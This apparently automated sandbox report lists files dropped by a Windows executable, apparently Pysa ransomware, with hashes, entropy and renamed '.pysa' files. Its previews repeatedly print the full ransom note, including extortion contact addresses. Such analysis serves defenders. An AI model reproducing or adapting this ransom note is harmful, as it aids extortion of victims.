                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\PeerDistRepub\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Publishers\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\AdobeARM.log.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.363673808529789
                  Encrypted:false
                  SSDEEP:96:uCdVP/jUQ8neV4rBo1JxUk706bVMJtyYRDof82yKJFoJzIhyXRi/B49OKUkSMgHD:lPLUGV42fl06byrygY8Yo2Qhi/B49OKI
                  MD5:F88FB5B3E91C38D98FFBE8017438FD93
                  SHA1:93F4328E02E270208DDE6B8C36FA38A0894A4886
                  SHA-256:374EFC0B7153EAF7B4A669AB3D3296036D985B7EAA871C620BACF59220601B03
                  SHA-512:10BD8E245C78DECCF8DC808027FDFEE7EDAFA50123C2BE1099B61EFD9FEB6522F6492D819DBA66268B386CEDAF272112AF430B42EECDB1C4941988A34725DECB
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\ArmUI.ini.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998191529620112
                  Encrypted:true
                  SSDEEP:6144:rgP+VSj9quFWTsaf6wbzc6bFlk9lpNNhH:rgO5TsafUGOzb
                  MD5:D547C10D83B86FE2BC1F283CBAEAA773
                  SHA1:F37E7B513AF6EE84A9065748321BFA8AD432E96C
                  SHA-256:D47EDEE80750F0E314420135620D5579EC53ABEEB219306FFD7823972D318400
                  SHA-512:D01E70ECC4D1BABF79C97F68C57C8312C1FF1419CAAC0EEA896AFDB75399D65D7726E8EB1AE1CEF22067D5D683B3BAE0A2338BB507CE082C0E1038409E8E11CA
                  Malicious:true
                  C:\Users\user\AppData\Local\Temp\CR_8F2A8.tmp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\Low\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\SetupExe(202007230953501D8).log.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.998801738970454
                  Encrypted:true
                  SSDEEP:6144:RMH/hZysvxoc/lgSGpSTObgoSdAKLTwcNzG:RMfhosJrgSGpohLxLdNK
                  MD5:57FABC788176D36CF717204F754FA8CE
                  SHA1:26069FC09B3316A77B2B99DACB4924EFEBEB9D65
                  SHA-256:DBFF184A8FA60B0145B572FDA1A6BF144CFB3217CB6D7B81BB5F7BF52083BF81
                  SHA-512:A3CD18BC862F5D84D3F21B98382091DBFB21C0DDE77E182A1B3BDC36ED746ABA00A18A6E0B75E9F9CC51EC80F5DFF66205666409A201A68A08F407D783A31655
                  Malicious:true
                  C:\Users\user\AppData\Local\Temp\acrocef_low\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\acrord32_sbx\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\chrome_installer.log.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):22528
                  Entropy (8bit):7.929411361538718
                  Encrypted:false
                  SSDEEP:384:39umcp8vqSGGs98apeRe/11nwM/mSQs/z5RHeqkNyNcY0WEwP3SHjR:RRR3Ve/11wM/x5/z5RH3k4NPOw0jR
                  MD5:0F3DF96C3DA47D23AC6CEB72905AB891
                  SHA1:48FDE9AA089662E5D51F4B15B3B352646C00E3E8
                  SHA-256:C2785C0F67C321C7343A7C1102EFE229B4390590068C4BC92133A5BC7B8707DD
                  SHA-512:874D2D51004D1FCDD56FBB755EABA9E2D63D403FC61603CADC036AD85E104B5737E05BD9FF4C1379C4EEF74410FFE1B146E264EA3E3F74F3C7909645E2FCF129
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\van1qgiu.sdl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\VirtualStore\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\Desktop\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.04499933192959
                  Encrypted:false
                  SSDEEP:48:rADRD60HiG3mFO9ZjYRruZFiS7+I1rzmcNl3TuABWb+jg1qPAGKWZcbd9cykA9AJ:cRDnHV3mOZ0d2FiSDrzmcrnPjg1a57cK
                  MD5:8EF7AA016873C5EE0A1E4C97FA44C191
                  SHA1:E848804FB97847C5863DBF649322D5613DB1BBCF
                  SHA-256:64AB3E9089937E9E43CE90100DB60855D5A10AB72F872773756DD6017A03B885
                  SHA-512:C1B355FC4A7D2161398D64DB98DD05339BECE77E7B9AFE2980ACAEBC6B8A07765B3E2B158543B6A1D84C0080FDADA0AF140B7BACA065582EC8423BD7133EC96E
                  Malicious:false
                  C:\Users\user\Desktop\GAOBCVIQIJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.077767880717833
                  Encrypted:false
                  SSDEEP:48:4lAHfEZ0IxZ+bfrfWl2E3sUG7KQPtYRm8fgQ+w0MejAAME8UxjFsKlIVauKXuMZc:R/65ubjNKsjr+Rvgpw7ejAxE8IjFsr7f
                  MD5:EE1E9105BAF9E78C30525D243983B7AD
                  SHA1:72BDE3B90D798A4EB338F34582ED363D3684AECE
                  SHA-256:D5B6C806B9E82D73021061719C19D200DFC58ED00FFC7E24BA06A05E544196BE
